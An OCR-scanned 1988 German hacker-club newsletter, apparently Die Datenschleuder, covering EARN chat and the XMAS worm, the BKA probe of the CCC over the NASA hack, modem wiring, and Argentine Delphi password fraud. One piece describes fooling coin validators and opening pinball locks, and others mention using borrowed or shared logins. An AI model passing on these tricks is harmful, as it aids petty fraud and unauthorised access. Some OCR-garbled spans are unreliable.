Kurzmeldung
Während des letzten Pariser „Salon du Livre“ bildete
sich eine Gruppe, die den Kampf gegen die Zensur
aufnahm: „informel Renvoyons la censure“. Das
er.ste Bulletin mit Nachrichten aus der nicht nur
französischen Welt gewisser großer Brüder;
Difpop, 14, rue de Nameuil, F 75015 Paris.
Seite 11
Dieser Betrag müßte von einer Firma oder Zeit-
.schrift aufgebracht werden, die dafür die Ver¬
triebsrechte an den Modembausatz erhält.
Modemminimalversion
Die größten Probleme liegen bei der „Zulassungs¬
fähigkeit“ des Modems. Die Post wehrt sich mit
Händen und Füßen gegen alles, was in dieser Rich¬
tung von privaten Anwendern unternommen wird.
Die entgültigen Zulassungsbedingungen sind nicht
bekannt, lediglich vorläufige Richtlinien sind ver¬
fügbar. Zunächst soll eine „Minimalversion“ des
Modems entwickelt werden, die möglichst wenige
Streitpunkte, die bei der Zulassung entstehen könn¬
ten (Hayes-Befehlssatz etc), streift. Sie soll zum
legalen, kostenkUnstigen Betrieb einer Mailbox aus¬
reichen.
Die Enwicklungszcit hängt im wesentlichen davon
ab, wie schnell die rechtliche Lage und die Bedin¬
gungen für eine Zulassung vor dem Europäischen
Gerichtshof und bei der Bundespost endgültig ge¬
klärt sind. TREIFKY
S>n(cnSil)lc»ber
EARN
oder das Erste Außerirdische Regional Netz
Vor einigen Wochen entdeckleich, daß an meiner
Universität ein Anschluß an EARN existiert. Ein
Bekannter lieh mir sein Login samt Passwort und
los ging es.
Als erstes stürzte ich mich auf das Terminal, eine
Siemensanlage unter dem VM/CMS Betriebssy¬
stem. Nach demEinloggen tippte ich erstmal SETUP
NETZE um das Netz zu aktivieren. Ab da begannen
die Schwierigkeiten, Mein erster Befehl, den ich an
den EARN-Knoten absendete war/signup Vorname
Nachname. Damit meldet man sich bei DEARN als
Benutzendes InterChat an. Nach meinem Handbuch
hätte jetzt die Meldung kommen müssen, daß man
sich freut, mich bei InterChat begrüßen zu dürfen.
Darauf seelisch eingestellt, war die Meldung ’ You
banned from this Rclay’ ein Schock. Unter Relay
versteht man die einzelnen Knoten der Datennetze,
die so aufgebaut sind wie EARN bzw. das US-
Gegenstück BITNIC.
Nach Anfragen beim Operator bekam ich zu hören,
daß ich wohl gegen die EARN- R ichtlinien verstoßen
habe. Mit diesem Aha-Erlebnis wurde ich bei dem
Besitzer des Login vorstellig. Er war genau einmal
bei EARN gewesen, und da hatte er nichts getan.
Eine suspekte Angelegenheit. Glücklicherweise
bekam ich zwei Tage später durch eine Vorlesung
ein eigenes Login für die Siemens.
Ein weiterer Versuch, mich bei DEARN einzulog¬
gen brachte den gewünschten Erfolg. Auch der näch¬
ste Befehl - /signon Nickname channel - klappte
hervorragend. Dann brach das Chaos auf meinem
Bildschirm aus. Irgendwie sah es aus, als würden
hunderte von Leuten gleichzeitig in einer Mailbox
miteinander reden. Nun, cs waren etwa 30 Leute, die
sich eingeloggt hatten.
Something about EARN
EARN ist ein europäisches Datennetz zum Aus¬
tausch von Informationen und Programmen. Prak¬
tisch heißt das, man kann auf dem Netz direkt mit
anderen Leuten chatten. Nicht nur mit Leuten, die
sich bei EARN-Relays einloggen, sondern mit je¬
dem, der sich an einem Relay einloggt, da zu anderen
Netzen Querverbindungen existieren, weltweit etwa
1300. Neben Europa und USA auch Exoten wie
Canada, Mexiko, Israel und Japan.
Allerdings ist das zu einem gewissen Maße Theorie,
S>«lcttSH)leuicr
da die Netze eine nette Eigenschaft haben; Sie bre¬
chen gern zusammen. Zwischen den Relays liegen
die Kabel bzw. Satellitenverbindungen, die allseits
bekannten Links, und die beliebteste Fehlermeldung
lautet 'Link Failure on xxxxx to yyyyy path’ (Kurz
LF). Wer einen EARN-Anschluss benutzen kann,
sollte sich von EARN die Hilfsliste schicken lassen.
Auf gut VM/CMS heißt das: Teil Relay at DEARN
/help’.
Zum Beispiel kann man mit/who abfragen, wer sich
gerade auf EARN aufhält. Diese Informationen sind
sehr strukturiert. Jemand von ’TAUrelay’ kommt
aus Israel. Jemand von ’Germany ’ kommt aus Deut¬
schland (oder auch nicht). Jemand mit der Meldung
’Geneva’ kommt meistens aus Irland. Zum Reden
stehen die 'Public Channels' zu VeiTügung. Das sind
die Kanäle 0 bis 99. Will man privater reden, wech¬
selt man zu einem Kanal zwischen 100 und 999.
Diese werden bei Abfragen von /who nicht ange¬
geben, Es gibt noch die Kanäle zwischen 1000 und
9999. Aber die sind nur besonderen Leuten Vorbe¬
halten.
Die Anslandsregeln
Es gibt auch Richtlinien zur Benutzung von EARN;
- man darf nicht auf einen privaten Kanal wechseln,
wenn dieser besetzt ist
- man darf keine Zeichensatz-Bilder schicken
- man darf nicht hart fluchen und schmutzige Witze
erzählen
- man sollte Englisch reden
- man darf nicht hacken.
Es gibt noch andere Möglichkeiten auf EARN. Zum
Beispiel kann man sich auch an andere Relays wen¬
den. Man darf sich zwar nicht einloggen, aber man
kann erfragen, wer sich dort so tummelt. Möchte
man jemanden anchaiten, kann man ihn dann über
BITNICAJNINET rufen. Dafür tippt man einfach
Teil Userid at Standort’.
Auf diese Weise erreicht man auch Leute, die nor¬
malerweise nicht in EARN sind. Derzeit ist das z.B.
die einzige Möglichkeit, das Wetter in Tokyo zu
erfragen. Aber man kann natürlich auch Mailbox¬
ähnliche Systeme erreichen. Das bekannteste ist da
wohl CSNEWS at MAINE. Dort kann man sich alles
schicken lassen, von PD-Software bis zum Gedicht
des Tages. Ein andere Box ist UH-INFO, mit den
Subservem Arpanet und Atarinet.
Seite 12
Anfang Dezember ’87 wurde der Deutsche Hauptk¬
noten von Darmstadt nach Bonn verlegt. Außerdem
wurdedie Leitungen von 24(X) Baud auf 9600 Baud
erhöht. Nachdem DEARN wieder aktiv war, merkte
man das sofort: Die LF kamen viel schneller.
Geschwindigkeit ist bei EARN so eine Sache. Man
kann Glück haben, und die Anwort ist vor der Frage
wieder da. Nachmittags dauenesS Minuten,bisman
eine Antwort bekommt. Dafür hat man morgens ein
reines Vorort-Gespräch. Nur Deutsche, Bayern und
Holländer.
Der XMAS-Virus
In der zweiten Dezemberwochc kan es auf dem
Relay zum ersten GAV (Größter Anzunehmender
Vireneinsalz). An einem kalten Donnerstagmorgen
1 STOP (9t
2 Voi-"*
■3 COX« S»
j|
hl'coivs V ^ r~
J i ONIY COIX «ElEAJI
»Oß vOCa; CAi,i.S
lONC
O-SfANCt b
Oi«fCT0«T
ASSlSSAXCt
»idSi sn
INS’AVCTIOXS
EMeSGtNCTO
■ WAlTtOOOlAl <OX<
f Ot»OSi' »«
V S tVn >
) OlAl XUM»l*
1 WAIT (oa EtlAl TOst
2 P>Ai oafKATO»
xo cevvs itlDlO
\{iO))un'7*72\
□ s m
00S
HOB
0 0 0 _
( *Ön tON(5 DiSTAACt CAU5 ^
1 LiSrcM ro» oiAt. TOM
1 PIAI A<5 <;mown BFlOW 1
CWJWX'..
«OWfjrff
US COWSOft*
STATiOx’O > '*ML>C0a<ia
rr-ee . ■xlOuaa«!» e-xc
All ►ojTiojj® a.»»i«COT •*«:
C»«>*T0<I «irii «0»'l ox i»il»rTt»
bekam ich ein File names XMAS. In meinem ju¬
gendlichen Leichtsinn startete ich es. Erst sah ich
einen Weihnachtsbaum und dann zirka 30 Fileende-
Befehle. Das Programm ging meine Namensliste
(diese existiert auf allen VM/CMS Rechnern und
kann erweitert werden) durch und sendete sich selbst
an die Leute.
Geile 13
Es gibt zwei Möglichkeiten, mit XMAS umzugehen.
Entweder man läßt ihn gewähren und hat dann eine
formatierte Platte. Oder man drückt Reset, dann
braucht man eine Stunde, bis man durch einen Ope¬
rator wieder Zugang zu seinem Rechner hat, 24
Stunden später konnte man sich einloggen wo man
wollte, egal ob Europa oder USA, alles redete über
XMAS und wünschte dem Programmierer wenig
Nettes. Die Variablennamen waren übrigens
Deutsch.
In den folgenen Tagen mußte man das Relay in Ruhe
lassen, da durch das ständige Übertragen von XMAS
das Netz stark verlangsamt wurde. Interessant zu
bemerken:'Eine Warnung in die USA hat die Ope¬
ratoren dazu veranlaßt, in die Header der Relay-
Messages eine Wamug einzubauen. Eine Warnung
an den Deutschen Operator brachte keine Reaktion.
Wer gEARN möchte
Der Zugang zu EARN wird in Deutschland ziemlich
unterschiedlich gehandhabi. In Hannover und Ham¬
burg wird dieser Zugang generell nicht erlaubt. In
Heidelberg und Oldenburg kann jeder Student ans
Netz. Sinnlos istEARN sicher nicht. Man lemtLeute
kennen und man bekommt Informationen. Wer al¬
lerdings auf billige Software hofft, hat keine Chance.
Der normale Chattcr ist ein Student der Naturwis¬
senschaften ohne Computer. Sie kennen zum Teil
nicht mal den Unterschied zwischen Bit und Byte.
Aus manchen Universitäten und Instituten schalten
sich zu mehr als S0% nur Mädchen zu. Komisch,
wenn man bedenkt, wie selten diese an Computern
zu finden sind.
Falls ihr mehr Uber EARN wissen wollt; Ich bin ganz
einfach zu erreichen: Teil 98B030 at DOLUNIl
Text. Dann habt ihr mich meistens am Hörer. Es sei
den ihr bekommt wieder ein LF on DHVRRZNl lo
DOLUNIl path. Dann habt ihr Pech gehabt.
Terra
SmtcnSdjIcubct
BKA unter Fahndungsdruck
CCC (HamburgAViesbaden) - Über vier Monate
sind vergangen, seitdem das Bundeskriminalamt
(BKA), mit in der Bundesrepublik beispielosen
nächtlichen Hausdurchsungen, die Jagd auf ver¬
meintliche Hacker beim Hamburger Chaos Com¬
puter Club e.V. (CCC) eröffnete.
Mitte September trat der Club mit Informationen an
die Öffentlichkeit, dieein eklatantes Sicherheitsloch
in einem Großrechnerbetriebssystem der Firma Di¬
gital Equipment belegten. .Jlncked' hatten sich an
den Club gewandt, nachdem es ihnen gelang, in circa
135 Computersysteme des wissenschaftlichen In¬
formationsnetzes der Luft- und Raumfahrt sowie der
Hochenergiephysik einzudringen.
Mittels sogenannter „Trojanischer Pferde“ unter¬
gruben sie die Sicherheitsroutinen und installierten
unter anderem Programme, die die Kennworte aller
Nutzer auskundschafteten. Betroffen von diesem
,JIack“ waren neben der amerikanischen Raum¬
fahrbehörde NASA führende Institute im neun west¬
lichen Ländern.
Raubkopien auf Großrechnern
Bei der durch den Club sofort nach Bekanntwerden
eingeleitetcn „Schadensbegrenzung“ wurde neben
dem Hersteller auch der amerikanische Geheim¬
dienst CIA informiert. Man wollte, so ein Club-
sprccher, vermeiden, daß der Club sich aufgrund der
Brisanz der betroffenen Systeme zum Spielball der
Geheimdienste entwickelt. So war es selbstver¬
ständlich, daß vor einer Veröffentlichung die be¬
troffenen Systeme wieder „gesichert“ werden mu߬
ten.
Beim Vergleich der von den .Hackern“ angefenig-
ten Liste der betroffenen Computer mit der Liste des
Herstellers ergaben sich jedoch zahlreiche Unstim¬
migkeiten. So wurden an führenden Forschungs¬
einrichtungen, auch im Bundesgebiet, auf dem se-
cond hand Markt erworbene Großrechner ohne Li¬
zenz betrieben. Gemeinhin wird soetwas als „Raub¬
kopie“ bezeichnet.
Als Folge der Veröffentlichung dieses ,Hacks“ be¬
sannen sich die Wiesbadener Polizeispezialisten
einer Anzeige der französichen Niederlassung der
Philips AG. Diese hatte im Herbst 1986 - nachdem
der Gesetztgeber in der Bundesrepublick das Aus¬
spähen und Verändern von Daten unter Strafe stellte
- Anzeige erstattet. Nach Angaben von Philips waren
Snfeiiädjlcubcr
Hacker in die Fertigungssteürung cingedmngcn.
Die Ermittlungen der französischen Behörden führ¬
ten in die Schweiz zum Genfer Kemforschungs-
zenirum CERN. Dieses beklagt schon seil 1984
ständig Einbrüche durch Hacker. Unter den Hackern
selbst gilt CERN als die .Huropäische Hackerfahr¬
schule“ in der sich die Hacker „die Klinke in die
Hand geben“. Die schweizerSystemspezialisten äu-
ßertenden Ermittlungsbehörden gegenüber den Ver¬
dacht, daß der Hamburger Chaos Computer Club
Verursacher dieser Einbrüche sei.
So erwirkte die Staatsanwaltschaft, einen Tag nach
Veröffentlichung des Nasa-Hacks, die ersten Durch¬
suchungsbeschlüsse. Inzwischen wird gegen sieben
„Computerfreaks“ aus dem Umfeld des CCC, in¬
zwischen auch wegen des publiziertem NASA-
Hacks, ermittelt. Begleitet wurden die Ermittlungen
durch ebensoviele Hausdurchsuchungen, bei denen
umfangreiches Material sichergestellt wurde.
MegaChip
NETWORKE^G
Hart getroffen wurden durch die Ermittlungen die
beiden Vorstandsmitglieder des Clubs. Beide sind
auch journalistisch tätig. Steffen Wemery unterhält
seit 1984 einen Informationsdienst im Bildschirm¬
textsystem der Post. Beiden Durchsuchungen wurde
das Redaktionssystem sichergestellt, so daß der
Dienst nicht mehr fortgeführt werden konnte. Zwei
Monate allein benötigten die Spezialisten vom
BKA, um eine Kopie der für die Fortführung des
Dienstes benötigten Daten anzufertigen. Inzwischen
sind auch Computerteile zurückgegeben worden.
Dabei wurde festgestellt, daß die Ermittlungen durch
unsachgemäßen Umgang mit den Gerätschaften und
einem daraus resultierenden Geräteschaden verzö¬
gert wurden. -r.
hoffnungslose Bestrebungen
Seit der letzten Durchsuchung sind knapp vier Mo¬
nate vergangen. Bis zum heutigem Tage wird den
Anwälten der Beschuldigten die Akteneinsicht ver¬
wehrt. Das B KA und die Staatsanwaltschaft tun sich^
Seite 14
schwer Licht in das Dunkel dieses Falles zu bringen.
Mag auch das sichergestellte Material an Umfang
zwar zugenommen haben, so scheinen die Spezia¬
listen vom BKA nicht in der Lage zu sein ihre
Vorwürfe zu präzisieren und zu belegen,
Die Hoffnungslosigkeit der Bestrebungen des B KA
wird ersichtlich wenn man Hintergründe eines wei¬
teren Verfahrens miteinbezieht. So wird gegen den
Pressesprecher des Clubs, welcher nach internen
Informationen einer der Haupiverdächtigen sein
soll, seit eineinhalb Jahren wegen des Verdachts auf
Verstoß gegen das Fernmeldeanlagengesctz er¬
mittelt. Normalerweise werden geringfügige Ver¬
stöße, bei gleichzeitig erhobenen schwereren Vor¬
würfen, eingestellt. So jedoch nicht in diesem Fall.
Denn in der Ermittlungsakte findet sich ein Ver¬
merk, daß eine Anklage oder Verurteilung in den
Ermittlungen des BKA kaum zu erwarten sei. So ist
es zu erklären, daß die Hamburger Staatsanwalt¬
schaft zunächst das geringfügige Verfahren weiler¬
verfolgt.
Doch mit einer baldigen Einstellung des Hacker¬
falles ist nicht zu rechnen. So ist zu vermuten, daß
gerade die französichen Ermitilungsbehörden die
Deutschen kräftig unter Druck setzen, jetzt endlich
einen mutmaßlichen Täter zu präsentieren und zu
überfuhren. Der Fahndungsdruck wird weiter erhöht
- Insider bezweifeln allerdings den Erfolg.
So stellten schon die Hamburger Hacker fest: Der
Gesetzgeber hat cs versäumt, mit Einführung der
Straftalbestände auch für die nötige Ausbildung der
Ermittlungsbehörden zu sorgen. So fehlt cs dem
BKA an Kompetenz und Augenmaß in dieser Sache.
Eine Chance, so die Hacker, der wirklich gefährli¬
chen Computerkriminalität Herr zu werden, haben
die Computerspezialisten des BKA vertan.
S.Wernery 062106 Feb SS BEREICH RED BKA DRUCK
CLINCIIIDS-REDIS.WERNERYI07.02.88I15:5II56HZ.
Snlcnörftlcubcr
Modemanschluß
Die Modem-Anleitung sagt über den Anschluß
nichts Wichtiges aus, sondern ist (wegen der
USA-Normen) eher etwas konfus.
Es reicht aber der 2 Draht-Anschluß, wie er bei den
meisten Hauptanschlüssen auch verwirklicht wird,
jedenfalls bei den ,.alten“ (neu heißt; Spezialstecker
für ISDN, darüber weiß ich nix, dürfte aber nur neuer
Stecker sein). Dort gehen aus der Wand 4 Drähte
raus, entweder steckbar (4 Pin-Stecker) oder so, daß
man einen Deckel abschrauben muß und (z.B.) ein
lO-Meter-Kabel mit den Poststeckem (flach, rech¬
teckig, durchsichtig) einfach angeschlossen werden
kann. Wenn man sich den Stecker ansieht, sind dort
nur 3 Kabel drin. Davon sind bei einer „normalen“
Anlage (1 Hauptanschluß, keine Nebenstelle) nur 2
Kabel wirklich angeschlossen: die beiden, die direkt
nebeneinander liegen. Nur diese beiden sind auch
wirklich wichtig, das Modem erkennt Klingeln - das
deutsche Besetztzeichen usw. erkennt es leider nicht.
An dem Modem ist ein einfaches, 4-poIiges Kabel.
Es werden nur die rote und die grüne Leitung ge¬
braucht, die anderen kann man abschneiden. Jetzt
stellt sich die Frage, ob man immer umslecken will
(oh weil) oder umschalten oder alles (Teflon und
Co.) immer dranlassen will. Das Modem hat noch
einen zweiten Anschluß, an dem ein USA-Telefon
(Stecker-Nomn) .so angeschlossen werden kann, daß
immer, wenn das Modem aus ist, von dort aus tele¬
foniert werden, und außerdem mit den Modem-
Befehlen auf Telefon (Voice) und zurückgeschaltet
werden kann. Dazu eignet sich gut ein ganz einfaches
Telefon vom Conrad-Electronic-Grabbeltisch für
ca. 20 DM (ohne den Stecker!).
Ich habe es etwas anders gemacht: Ich habe 2 Um¬
schalter 1 2 pol & 1 pol) so mit dem ganzen Kram
verlötet, daß ich entweder nur Post (2 polü) also
normales Teflon dranhabe, oder Nicht Post, d.h.
entweder Modem oder Ami-Phone (s o. von Con¬
rad), überden 1-poligen Umschalter, der andere Pol
liegt bei Modem & Phone gleichzeitig an. In das
Ami-Phone hab ich außerdem noch einen Schalter
eingebaut, mit dem sich das Mikro ausschalten läßt.
Dadurch, daß das das Ganze steckbar gemacht wurde
(6 M-Kabel vom Conrad), ist die Chose höllisch
schnell abbaubar: Wandsockel auf, Kabel raus, Ge¬
häuse des Umschalters auf. Stecker (Original-Post-
Teflon!) raus, diesen Stecker in den Wandsockel,
Deckel anschrauben - fertig. Das 10 M-Kabel kann
die Pest m.E. nicht messen, der Rest ist immer nur
dran, wenns gebraucht wird.
Legalize private Modems!
Seite 15
Im folgenden ein Artikel aus LA RAZON - {argentinische Tageszeitung, vor 76 Jahren gegründet, 3 Ausgaben I
täglich (7). eine der drei wichtigsten Zeitungen des Lundes) - gefunden von Stefan Weirattch, übersetzt von
Rena Tangens.
La Razon
Freitag, 25.September 1987
Interpol argentinischen Hackern auf der Spur
Laut Bericht von Alberto A. Antonucci, einem der Ein eingetragener Benutzer kann obendrein das
Direktoren, wurde die Firma siscoTEL s.a. (s.a. = Passwort alle fünf Minuten ändern, wenn es ihm
Aktiengesellschaft), in unserem Land Eigentümerin paßt. Außerdem bricht Delphi die Verbindung ab,
von DELPHt - Anbieterin von Datenbank, Telekom- wenn jemand es ausprobiert und das System dreimal
munikation und anderer Dienste - wurde also seine hintereinander nicht das richtige Passwort erkennt.
FirmaübereinenZeitraumvonsechsMonatenOpfer Wenn beim fünften Anruf, also dem fünfzehnten
einer Aktion von Hackern und dabei um einige Versuch, nicht die richtige Kombination kommt -
zehntausend Dollar geschädigt. Mittlerweile sei In- mathematisch gesehen gibt es Millionen möglicher
terpol eingeschaltet und die Untersuchungen weit Kombinationen - legt das System nicht nur auf,
fortgeschritten, da bereits die Empfänger der Plau- sondern sperrt auch gleich den Account und fordert
dereien von Computer zu Computer entdeckt wor- den Benutzer zu einer Erklärung auf bzw. zeigt ihm
den seien, die via Telefon und unter der Benutzung an, daß irgendjemand versucht, einzudrtngen.“
des geheimen Passwortes, das entel (örtliche Te- ——————
lefongesellschaft) an Delphi als Benutzer dieser Zwei junge Deutsche aus Hamburg
Dienstleistungen vergeben hatte. ,X)ie letzte Rech- ——
nung, die wir bekamen, belief sich auf Uber 10.0(X) Das Thema der Informationspiraten genannt ’Hac-
US Dollar“, bestätigte Antonucci, nachdem er die ker’ wurde sofort wieder aktuell, als vor einigen
Praktiken der staatlichen Firma erläutert hatte. Tagen zwei junge Deutsche aus Hamburg einem
——deutschen Wochenmagazin ein Interview gaben und
Der Schakal erzählten, daß sie, ebenfalls via Telefon, in das
■ ■ '■■■' Telekommunikationsnetz der NASA, das insgesamt
Andererseits kommentiene er den Artikel, der in >33 Knotenrechner in Europa und Asien umfaßt,
einer anderen Tageszeitung erschienen war und in eingedrungen seien. Das nordamerikanische Un-
dem ein einheimischerHackerporträtiert wurde, der ternehmen, ein japanisches und digital - eine der
auf den Decknamen 'Schakal’ hört. Er berichtete, Firmen, die das größte Ansehen genießt in der Ent-
daßerundseineKollegenimBesitzderpersönlichen Wicklung von sicherer und leistungsfähiger Soft-
Passworte von vielen Benutzern von DELPHI seien wäre für diese Art der Telekommunikation - haben
und damit heimlich von allen Diensten Gebrauch Eindringen bestätigt. „Seil Belriebsaufnahme
machen könnten „und damit ahnungslosen Benut- von Delphi haben wir hier vier Fälle gehabt“, räumte
zern ungeheure Rechnungen aufbürden.“ Antonucci ein, ,,und bei allen gab es - unglückli-
Antonuccis Widerspruch ist ganz grundsätzlich: cherweise für den jeweiligen Teilnehmer, glückli-
,U.assen Sie uns bitte nicht in den Bereich von cherweise für uns - leicht zu entdeckende Fehler bei
Science Fiction oder irgendeiner anderen Art von der Benutzung dieser Dienste. Wenn gesagt wird,
Aberglauben gehen. Dieser Typ Hacker, den einige daß das Passwort geheim ist, wollen wir damit sagen.
Veröffentlichungen, nicht nur in unserem Land, ent- daß es geheim sein muß, es darf nur einer wissen und
werfen, existiert nicht. Wissenschaftlich gesehen sonst niemand.“
kann er gar nicht existieren. Unser System hat zwei
'Eintrittskarten': derName, den derTeilnehmerver- unbegreiflich0 Rechnungen
wendet - das kann der richtige Name oder auch ein “
Deckname sein - und das Passwort. Das erste ist nicht Danach erzählte er la razon, daß demgegenüber der
schwierig zu ermitteln, da einer Benutzerliste exi- Betrug, der jetzt entdeckt wurde, seinen Ursprung in
stiert. Das zweite ist eine Kette oder eine Folge von einer Computer- und Telekommunikationsausstel-
Buchstaben und Zahlen zwischen 6 und 33 Stellen. lung letzten Jahres hat, die jährlich in einem ruhigen
0Alcii£d|lcHi)cr
Seite 16
Hotel durchgeführt wird. ,,Wir brauchten eine spe¬
zielle Telcfonleitung für unseren Mes.sestand, um
Dienste vorführen zu können, die DELPHI USA dort
anbieten,“ erklärte Antonucci, „Dieser Telekom-
rnunikationsservice wurde uns im Mai eingerichtet
und zwei Monate später hörten wir auf. ihn zu be¬
nutzen und die Ausstellung war beendet. Ab De¬
zember letzten Jahres und fortschreitend bis März
diesen Jahres gab es dann einige unbegreifliche
Rechnungen. An diesem Punkt erstatteten wir An¬
zeige. Zum Beispiel schien es so, als ob wir am 1.
Januar dieses Jahres die Leitung nach Kanada von
11.30hbis 15.00 h benutzt hätten. Aber von 12.00
h bis 14.00 h desselben Tages gab e.s eine andere
Verbindung von uns, und zwarmitder Schweiz und
schließlich eine weitere ab 13.00 h bis 17.00 h mit
einem anderen europäischen Land. Ganz offen¬
sichtlich sind Zuschauer während der Ausstellungen
am Me.ssesland gewesen, die die Fingerbewegungen
des Votführenden auf der Tastatur beobachtet ha¬
ben, denn das Passwort ist nicht auf dem Bildschirm
zu sehen, und haben auf diese Weise den Code
herausgefunden. Auf der anderen Seite müssen wir
zugeben, daß die Handhabung dieser Passwone
nicht gerade vorbildlich war. Sie wurden einem
Angestellten xy anvertraut, der sie daraufhin in
einem Buch notierte, zu dem jeder andere Ange¬
stellte Zugang hatte; ein so wenig geheimer Dienst¬
weg macht Passworte nutzlos. DerTyp 'Hacker', der
die Informationen auf diese Weise ausfindig macht,
existiert tatsächlich. Hingegen ist der Mythos vom
Hacker, der die Passworte allein herausfindet und
dem kein System widerstehen kann, sympathisch,
aber mehr nicht. Delphi zählt auch weiterhin auf die
Technologie von DIGITAL, die eine der besten der
Welt ist.“
CLINCHIPADELUUNIPADEIUUNI22.01.88116:3615754 2.
SiilciiSdjIciibcr
Unglaublich aber wahr
Geschichten aus DATEX-P
Gut ein Jahr ist’s her. Ich will anmerkeii.daß ich
zum Zeitpunkt des Vorfalls im Vollbesitz meiner
geistigen Kräfte war. Ich habe grade mal wieder
'ne Public Domain-NUIin die Hände bekommen
und will mich mal ’n bißchen im DX umschaucn.
Zwei der frei belegbaren Funklionstasten meines
Terminalprogrammcs sind mit Teil A und B der
NUI belegt, aufeiner dritten habe ich die-wie sich
später rausstellte fehlerhafte - NUA irgend eines
britischen Rechners gelegt.
Ich klingle den PAD HH an. ein Ferngespräch. Ich
wohne in der Provinz, eine Fangschaltiing o.ä. ist
damit wohl ausgeschlossen. Der PAD piept, ich lege
den Tcflonhörer in meinen wunderbaren postzuge-
lassenen (!) Akustikkoppler, gebe das Dienstanfor¬
derungszeichen ein, der PAD meldet sich. Teil A und
B meiner Tlkng werden akzeptiert, in froher Er¬
wartung drücke ich auf meine dritte Funktionstaste.
Der PAD antwonet mit “Kein Anschluß unter dieser
Nummer“ oder so.
Sekundenbruchleilc später, ohne weitere Meldung,
schickte der PAD die Zeile “Hallo Hacker!“ auf
meinen Bildschirm, gefolgt von einer nicht enden
wollenden Sequenz aus BELsü Bleich vor Schreck
fiel ich fast von meinem Bürostuhl. Als ich mich
Sekunden später wieder gefaßt h,atie, hechtete ich in
Richtung Teflon und drückte mit einem karateähn¬
lichen Handkantenschlag auf die Gabel. Etwas spä¬
ter, als der Schreck verflogen w.ir, rief ich den PAD
noch mehrmals an, um den Vorfall zu reproduzieren.
Ohne jeden Erfolg.
Der Vorfall liegt schon länger zurück. Hat vielleicht
dennoch jemand irgend eine Erklärung? Neben der
naheliegenslen (Hallus etc.) fällt mir nur noch die
sehr unwahrscheinliche ein, daß jemand mein Te¬
lefon angezapfl und sich in die Leitung rcinge-
schaltet haben könnte. Das würde ich zwar der Post
und Komplizen sofort Zutrauen - sie machen’s ja
auch des öfteren - nur würden sie sich nicht freiwillig
derartig preisgeben. WAS IST DA BLOSS PAS¬
SIERT?
Ein mit DX befaßter befreundeter Postler erklärte
mir übrigens, daß so etwas nicht möglich sei, beeilte
sich aber hinzuzufügen, daß Unmöglichkeit kein
Grund dafür sei, daß es nicht dennoch passiere. In
DX sei allerhand Unmögliches möglich....
CLINCH/SYSOP/GAST/26.10,87/21 .'30/2885 Z.
Seite 17
Münzprüfer
“For amusement only"
Es gibt verschiedene Arten von MDnzprüfern.
Während Flipper und Video-Spiele auswechsel¬
bare, ziemlich kleine Prüfer haben, welche immer
nur einzelnde Münzen (1/2/S DM) prüfen, sind in
Geldspielgeräten (“Daddelmaschinen“) umfan¬
greichere, welche die Münzen sortieren & prüfen.
Diese können auch 10-Pfennig-Münzen prüfen.
In Fahrausweisautomaten sind komplexere Prüf¬
vorrichtungen vorhanden, die schon etwas mehr
Wert auf die Echtheit der Münze legen (hier wird
Z.B, auch auf Rändelung überprüft). Bei ziemlich
allen eingesetzten Geräten mit Münzprufem werden
die 5 Pence-Stücke (England) immer noch als DM
1.- anerkannt. Vermutlich aus diesen Gruden be¬
kommt man bei Banken kein Münzgeld aus anderen
Ländern.
Die Flipper/Videospiel-Münzprüfer erkennen z.B. 2
1/2 Gulden Münzen (Holland) öfters als 5 DM an.
Auch Ringe in entsprechenden Größen (wie z.B. aus
Kaugummiautomaten in Bahnhöfen) werden bei
diesen Prüfern noch als 1 DM - selten 2 DM - nach
etwas Behandlung (Klebeband!) akzeptiert. Hier
liegt allerdings möglicherweise schon eine Fabri¬
kation von Falschgeld vor, die, wie auf jedem Geld¬
schein deutlich zu lesen, mit nicht unter zwei Jahren
Knast belegt wird.
In den Bedienungs-Anleitungen von Geldspielge¬
räten taucht öfters der Satz auf: “Größtmögliche
Prüfsicherheit ist nur gewährleistet, wenn der Mag¬
net und die Gegenfläche der 5 DM-Laufbahn sauber
und frei von Metallspäne sind“. Ebenso wird hin¬
gewiesen: “Auf keinen Fall fetten oder ölen“, da
sowas nämlich leiten kann. In Japan gehen derzeit
einige Aufsteller von Zigarettenautomaten langsam
in den Ruin, weil ihre Automaten schon bei dem
kleinsten Ölspritzer (und sei’snurSalatöl) MUnze(n)
gezählt zu haben meinen. Generell: “Sollte das Gerät
nicht lot- und waagerecht aufgestellt sein, oder eine
Falschmünze wird häufig vom Prüfer angenommen,
so kann der Fehler durch Justage behoben werden.“
T^ink.
Ältere Williams-Flipper zählen angeblich etliche
Freispiele, wenn man sie etwas anhebi und dann
wieder der Schwerkraft überläßt. Zum Thema Flip¬
per: Im Gegensatz zu Videospielen, die Schlösser
mit Rundkopfzylinder aus ausländischer Fabrika¬
tion benutzen, sind Flipper-Schlösser simpel und
dementsprechend schlecht gesichert. Die Entwick¬
lung schreitet zwar auch im Hinblick auf die Si¬
cherheit voran, aber manche sollen immer noch mit
einerumgebogenen Büroklammerzuöffnen sein. Im
Gegensatz zu sonst
üblichen Verfahren ist die Aufschließrichtung links
herum. Ausnahmsweise hier einmal ein echtes Lob
an die deutsche Bundespest: diese setzt Prüfer aus
(relaüv) eigener Produktion ein, welche wesentlich
mehr Sicherheit bieten. Gerüchteweise hört man
zwar von 5 Drachmen-Münzen (Griechenland), wel¬
che bei älteren Teflonzellen als 1.- DM durchge-
lassen werden. Und die Moral von der Geschieht:
Laß prüfen deine Muenzen nicht.
Andy
8712052045 MUNZDS24.DOC Ls 16
HyperNet
Xerox kündigt Hyper-Ethernet an
SAN FRANCISCO, CA.; Jan. 7, 2010 - Xerox
kündigte heute Hyper-EherNet an, das Local
Area Network der vierten Generation. Zusätzlich
zur Übertragung von Text, Daten und Bildern
bietet Hyper-EtherNet die Möglichkeit der Über¬
tragung von Leuten.
Folgt UM Michael Liddle, Chef von Office Systems,
dann wird “die Übertragung von Leuten via Hyper-
EtherNet den Andrang vor Aufzügen wesentlich
reduzieren und Video-Konferenzen unnötig ma¬
chen.“ Bestellungen für das Hyper-EtherNet werden
ab dem nächsten Monat angenommen. Die Instal¬
lation wird ab dem dritten Quartal in Us Angeles
beginnen.
Salcn$i()Iciifccr
Im Hauptquartier der Wang Laboratories in Hobo-
ken, New Jersey, wird ebenfalls an einem neuen Netz
gearbeitet, dem Super-Hyper-WangNet, einem Lxi-
cal Area Network der zwölften Generation. Laut
Freddie Wang, Präsident der Wang Labs, “kann man
mit WangNet nicht nur Leute übertragen, sondern -
überlntcrconnect- und Utility-Verbindungen - auch
Möbel und Gebäude. Diese zusätzlichen Möglich¬
